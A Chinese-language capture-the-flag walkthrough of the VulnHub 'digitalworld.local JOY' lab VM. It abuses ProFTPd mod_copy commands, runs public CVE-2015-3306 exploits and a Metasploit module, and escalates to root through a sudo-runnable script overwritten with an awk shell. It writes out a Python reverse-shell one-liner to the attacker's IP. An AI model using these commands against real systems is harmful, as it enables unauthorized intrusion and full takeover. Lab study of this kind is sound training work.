digitalworld.loca_JOY

下载地址：https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

攻击者ip：172.20.134.129 net vmare

受害者ip：172.20.134.137 net vmare

参考：https://www.freebuf.com/articles/network/383185.html

https://blog.csdn.net/qq_42133828/article/details/99680203

https://blog.csdn.net/tomyyyyyy/article/details/115714221

主机发现

端口扫描

匿名登陆ftp

anonymous

在upload下载directory，可以获得Patrick用户的目录

web页面是ossec ，版本是0.8

OSSEC属于基于主机和应用的入侵检测系统，通过监视企业重要服务器和各种应用以避免企业资源被攻击、滥用和误用。把基于主机和基于应用的入侵检测系统分成了两大类，不过在实际环境中，往往会将二者结合在一起使用。黑客对主机进行侵入时，往往会同时攻击操作系统和应用服务上的漏洞。OSSEC是一个非常典型的主机型入侵检 测系统，我们可以通过了解它的体系结构与工作原理来了解这一类型的入侵检测技术。 

查找是否有这个版本的漏洞

连接失败

由于version_control存在于patrick路径中，我们是没有权限去获取的，所以尝试将其转移到/upload路径中

telnet 172.20.134.137 21此命令使用Telnet协议连接到IP地址192.168.119.137上的21端口。21端口通常被FTP服务使用。不过，使用Telnet进行此类连接主要用于测试或调试目的，因为Telnet不提供加密的通信，这意味着所有传输的数据（包括可能的用户名和密码）都是明文的。site cpfr /home/patrick/version_controlCPFR是"Copy From"的缩写。这一命令用于指定源路径，即你想从哪个位置复制文件或目录。在这个例子中，源路径是/home/patrick/version_controlsite cpto /home/ftp/upload/version_controlCPTO是"Copy To"的缩写。这一命令用于指定目标路径，即你想将文件或目录复制到哪里。在这个例子中，目标路径是/home/upload/version_control

这些命令属于FTP协议的扩展命令，用于在服务器端直接复制文件或目录，而不需要将文件首先下载到客户端然后再上传到目标路径。

使用这些命令之前，你通常需要通过FTP协议登录到服务器。这可能涉及发送USER和PASS命令来进行身份验证。如果你尝试使用Telnet执行这些FTP特定的命令，需要先确保服务器理解并接受这些FTP协议命令。

get version_control

下载版本相关的文件

We should switch to OpenSSH and upgrade ProFTPd.

我们应该切换到OpenSSH并升级ProFTPd。

意思是这个proftpd存在漏洞

查找版本漏洞，远程命令执行

等了很久也没有反应，换一个

cp /usr/share/exploitdb/exploits/linux/remote/36803.py /root/Desktop

python2 36803.py 172.20.134.137 /ossec/ id 

换49908.py

修改源码

/var/www/html/可能没有写入权限

version_control中提示了一个路径

能成功上传，但是没rce

修改php的源码，结果还是

再换个脚本

https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py

反弹shell

export RHOST="172.20.134.129";export RPORT=1111;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

获得shell 2

启动msf

search proftpduse 4show optionsset rhosts 172.20.134.141set sitepath /var/www/tryingharderisjoyrun

run之后，小马上传成功，但是没创建会话

尝试修改payload

show options

尝试到set payload 12，就成功了

在 patricksecretsofjoy发现用户名和密码

在路径/home/patrick/script/test可以免密

sudo -u root /home/patrick/script/test

指定用户root执行/home/patrick/script/test

提示没有权限

提权

尝试上传脚本文件到此路径中

echo "awk 'BEGIN {system("/bin/bash")}'" > test这个awk程序在其初始化阶段BEGIN会执行system("/bin/bash")命令，后者会尝试启动一个新的Bash shell。cd uploadput testtelnet 172.20.134.137 21 site cpfr /home/ftp/upload/testsite cpto /home/patrick/script/test

sudo /home/patrick/script/test 

原文始发于微信公众号（王之暴龙战神）：digitalworld.loca_JOY